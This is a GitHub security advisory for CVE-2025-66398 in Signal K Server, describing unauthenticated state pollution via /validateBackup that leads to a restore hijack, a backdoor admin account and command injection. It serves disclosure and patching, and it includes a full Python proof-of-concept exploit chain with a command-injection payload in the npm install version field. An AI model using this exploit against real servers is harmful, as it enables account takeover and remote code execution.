GHSA-W3X5-7C4C-66P9

Vulnerability from github – Published: 2026-01-02 15:11 – Updated: 2026-01-02 15:11
VLAI?
Summary
Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)
Details

Summary

An unauthenticated attacker can pollute the internal state (restoreFilePath) of the server via the /skServer/validateBackup endpoint. This allows the attacker to hijack the administrator's "Restore" functionality to overwrite critical server configuration files (e.g., security.json, package.json), leading to account takeover and Remote Code Execution (RCE).

Details

The vulnerability is caused by the use of a module-level global variable restoreFilePath in src/serverroutes.ts, which is shared across all requests.

Vulnerable Code Analysis: 1. Global State: restoreFilePath is defined at the top level of the module. typescript // src/serverroutes.ts let restoreFilePath: string 2. Unauthenticated State Pollution: The /skServer/validateBackup endpoint updates this variable. Crucially, this endpoint lacks authentication middleware, allowing any user to access it. typescript app.post(`${SERVERROUTESPREFIX}/validateBackup`, (req, res) => { // ... handles file upload ... restoreFilePath = fs.mkdtempSync(...) // Attacker controls this path }) 3. Restore Hijacking: The /skServer/restore endpoint uses the polluted restoreFilePath to perform the restoration. typescript app.post(`${SERVERROUTESPREFIX}/restore`, (req, res) => { // ... const unzipStream = unzipper.Extract({ path: restoreFilePath }) // Uses polluted path // ... })

Exploit Chain: 1. Pollution: Attacker uploads a malicious zip file to /validateBackup. The server saves it and updates restoreFilePath to point to this malicious file. 2. Hijacking: When /restore is triggered (either by the attacker if they have access, or by a legitimate admin), the server restores the attacker's malicious files. 3. Backdoor: The attacker overwrites security.json to add a new administrator account. 4. RCE: Using the new admin account, the attacker exploits a separate Command Injection vulnerability in the App Store (/skServer/appstore/install/...) to execute arbitrary system commands (e.g., npm install injection).

PoC

Here is a complete Python script to reproduce the full exploit chain.

import requests
import zipfile
import io
import json
import time

# Configuration
TARGET_URL = "http://localhost:3000"
BACKDOOR_USER = "hacker"
BACKDOOR_PASS = "hacked1234"

def step1_plant_backdoor():
    print("[*] Step 1: Planting Backdoor via State Pollution...")

    # 1. Create malicious zip with security.json
    zip_buffer = io.BytesIO()
    with zipfile.ZipFile(zip_buffer, 'w') as z:
        # Add backdoor admin user
        security_config = {
            "users": [{
                "username": BACKDOOR_USER,
                "password": BACKDOOR_PASS, 
                "permissions": "admin"
            }]
        }
        z.writestr("security.json", json.dumps(security_config))
        # Enable security to make the backdoor effective
        z.writestr("settings.json", json.dumps({"security": {"strategy": "./tokensecurity"}}))
    zip_buffer.seek(0)

    # 2. Pollute State (Unauthenticated)
    print("    [+] Sending malicious backup to /validateBackup...")
    res = requests.post(f"{TARGET_URL}/skServer/validateBackup", 
                        files={'file': ('malicious.zip', zip_buffer, 'application/zip')})
    if res.status_code != 200:
        print("    [-] Failed to pollute state.")
        return False

    # 3. Trigger Restore (Hijacking)
    print("    [+] Triggering restore to overwrite server config...")
    # Note: In a real attack, if /restore is protected, attacker waits for admin to use it.
    # Here we assume we can trigger it or security is currently off.
    res = requests.post(f"{TARGET_URL}/skServer/restore", json={"security.json": True, "settings.json": True})

    if res.status_code in [200, 202]:
        print("    [+] Restore triggered successfully. Backdoor planted.")
        print("    [!] PLEASE RESTART THE SERVER to load the new configuration.")
        return True
    else:
        print(f"    [-] Restore failed: {res.status_code} {res.text}")
        return False

def step2_execute_rce():
    print("\n[*] Step 2: Executing RCE as Backdoor User...")

    # 1. Login
    session = requests.Session()
    login_payload = {"username": BACKDOOR_USER, "password": BACKDOOR_PASS}
    res = session.post(f"{TARGET_URL}/signalk/v1/auth/login", json=login_payload)

    if res.status_code != 200:
        print("    [-] Login failed. Did you restart the server?")
        return

    token = res.json()['token']
    print("    [+] Login successful. Authenticated as Admin.")

    # 2. RCE Payload (Windows Example)
    # Injecting command into version parameter of npm install
    # Command: echo RCE_SUCCESS > rce_proof.txt
    cmd_payload = "1.0.0 & echo RCE_SUCCESS > rce_proof.txt &"

    # We need a valid package name to bypass existence check
    package_name = "@signalk/freeboard-sk" 

    print(f"    [+] Sending RCE payload: {cmd_payload}")
    headers = {'Authorization': f'Bearer {token}'}
    try:
        session.post(f"{TARGET_URL}/skServer/appstore/install/{package_name}/{cmd_payload}", 
                     headers=headers, timeout=5)
    except:
        pass # Timeout is expected as the command might hang or take time

    print("    [+] Payload sent. Check for 'rce_proof.txt' in server root.")

if __name__ == "__main__":
    # Run Step 1, then restart server manually, then Run Step 2
    # step1_plant_backdoor()
    step2_execute_rce()

Impact

Remote Code Execution (RCE), Account Takeover, Denial of Service. Verified: RCE is demonstrated by creating a file named rce_proof.txt containing the text "RCE_SUCCESS" on the server filesystem using the exploit chain.

Severity ?
9.6 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.19.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-66398"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-02T15:11:49Z",
    "nvd_published_at": "2026-01-01T18:15:40Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nAn unauthenticated attacker can pollute the internal state (`restoreFilePath`) of the server via the `/skServer/validateBackup` endpoint. This allows the attacker to hijack the administrator\u0027s \"Restore\" functionality to overwrite critical server configuration files (e.g., `security.json`, `package.json`), leading to account takeover and Remote Code Execution (RCE).\n\n### Details\nThe vulnerability is caused by the use of a module-level global variable `restoreFilePath` in `src/serverroutes.ts`, which is shared across all requests.\n\n**Vulnerable Code Analysis:**\n1.  **Global State**: `restoreFilePath` is defined at the top level of the module.\n    ```typescript\n    // src/serverroutes.ts\n    let restoreFilePath: string\n    ```\n2.  **Unauthenticated State Pollution**: The `/skServer/validateBackup` endpoint updates this variable. Crucially, this endpoint **lacks authentication middleware**, allowing any user to access it.\n    ```typescript\n    app.post(`${SERVERROUTESPREFIX}/validateBackup`, (req, res) =\u003e {\n      // ... handles file upload ...\n      restoreFilePath = fs.mkdtempSync(...) // Attacker controls this path\n    })\n    ```\n3.  **Restore Hijacking**: The `/skServer/restore` endpoint uses the polluted `restoreFilePath` to perform the restoration.\n    ```typescript\n    app.post(`${SERVERROUTESPREFIX}/restore`, (req, res) =\u003e {\n      // ...\n      const unzipStream = unzipper.Extract({ path: restoreFilePath }) // Uses polluted path\n      // ...\n    })\n    ```\n\n**Exploit Chain:**\n1.  **Pollution**: Attacker uploads a malicious zip file to `/validateBackup`. The server saves it and updates `restoreFilePath` to point to this malicious file.\n2.  **Hijacking**: When `/restore` is triggered (either by the attacker if they have access, or by a legitimate admin), the server restores the attacker\u0027s malicious files.\n3.  **Backdoor**: The attacker overwrites `security.json` to add a new administrator account.\n4.  **RCE**: Using the new admin account, the attacker exploits a separate Command Injection vulnerability in the App Store (`/skServer/appstore/install/...`) to execute arbitrary system commands (e.g., `npm install` injection).\n\n### PoC\nHere is a complete Python script to reproduce the full exploit chain.\n\n```python\nimport requests\nimport zipfile\nimport io\nimport json\nimport time\n\n# Configuration\nTARGET_URL = \"http://localhost:3000\"\nBACKDOOR_USER = \"hacker\"\nBACKDOOR_PASS = \"hacked1234\"\n\ndef step1_plant_backdoor():\n    print(\"[*] Step 1: Planting Backdoor via State Pollution...\")\n    \n    # 1. Create malicious zip with security.json\n    zip_buffer = io.BytesIO()\n    with zipfile.ZipFile(zip_buffer, \u0027w\u0027) as z:\n        # Add backdoor admin user\n        security_config = {\n            \"users\": [{\n                \"username\": BACKDOOR_USER,\n                \"password\": BACKDOOR_PASS, \n                \"permissions\": \"admin\"\n            }]\n        }\n        z.writestr(\"security.json\", json.dumps(security_config))\n        # Enable security to make the backdoor effective\n        z.writestr(\"settings.json\", json.dumps({\"security\": {\"strategy\": \"./tokensecurity\"}}))\n    zip_buffer.seek(0)\n\n    # 2. Pollute State (Unauthenticated)\n    print(\"    [+] Sending malicious backup to /validateBackup...\")\n    res = requests.post(f\"{TARGET_URL}/skServer/validateBackup\", \n                        files={\u0027file\u0027: (\u0027malicious.zip\u0027, zip_buffer, \u0027application/zip\u0027)})\n    if res.status_code != 200:\n        print(\"    [-] Failed to pollute state.\")\n        return False\n\n    # 3. Trigger Restore (Hijacking)\n    print(\"    [+] Triggering restore to overwrite server config...\")\n    # Note: In a real attack, if /restore is protected, attacker waits for admin to use it.\n    # Here we assume we can trigger it or security is currently off.\n    res = requests.post(f\"{TARGET_URL}/skServer/restore\", json={\"security.json\": True, \"settings.json\": True})\n    \n    if res.status_code in [200, 202]:\n        print(\"    [+] Restore triggered successfully. Backdoor planted.\")\n        print(\"    [!] PLEASE RESTART THE SERVER to load the new configuration.\")\n        return True\n    else:\n        print(f\"    [-] Restore failed: {res.status_code} {res.text}\")\n        return False\n\ndef step2_execute_rce():\n    print(\"\\n[*] Step 2: Executing RCE as Backdoor User...\")\n    \n    # 1. Login\n    session = requests.Session()\n    login_payload = {\"username\": BACKDOOR_USER, \"password\": BACKDOOR_PASS}\n    res = session.post(f\"{TARGET_URL}/signalk/v1/auth/login\", json=login_payload)\n    \n    if res.status_code != 200:\n        print(\"    [-] Login failed. Did you restart the server?\")\n        return\n    \n    token = res.json()[\u0027token\u0027]\n    print(\"    [+] Login successful. Authenticated as Admin.\")\n\n    # 2. RCE Payload (Windows Example)\n    # Injecting command into version parameter of npm install\n    # Command: echo RCE_SUCCESS \u003e rce_proof.txt\n    cmd_payload = \"1.0.0 \u0026 echo RCE_SUCCESS \u003e rce_proof.txt \u0026\"\n    \n    # We need a valid package name to bypass existence check\n    package_name = \"@signalk/freeboard-sk\" \n    \n    print(f\"    [+] Sending RCE payload: {cmd_payload}\")\n    headers = {\u0027Authorization\u0027: f\u0027Bearer {token}\u0027}\n    try:\n        session.post(f\"{TARGET_URL}/skServer/appstore/install/{package_name}/{cmd_payload}\", \n                     headers=headers, timeout=5)\n    except:\n        pass # Timeout is expected as the command might hang or take time\n\n    print(\"    [+] Payload sent. Check for \u0027rce_proof.txt\u0027 in server root.\")\n\nif __name__ == \"__main__\":\n    # Run Step 1, then restart server manually, then Run Step 2\n    # step1_plant_backdoor()\n    step2_execute_rce()\n```\n\n### Impact\nRemote Code Execution (RCE), Account Takeover, Denial of Service.\n**Verified**: RCE is demonstrated by creating a file named `rce_proof.txt` containing the text \"RCE_SUCCESS\" on the server filesystem using the exploit chain.",
  "id": "GHSA-w3x5-7c4c-66p9",
  "modified": "2026-01-02T15:11:50Z",
  "published": "2026-01-02T15:11:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66398"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/commit/5c211eaf33f0ccadbaed6720264780d92afbd7f8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/SignalK/signalk-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.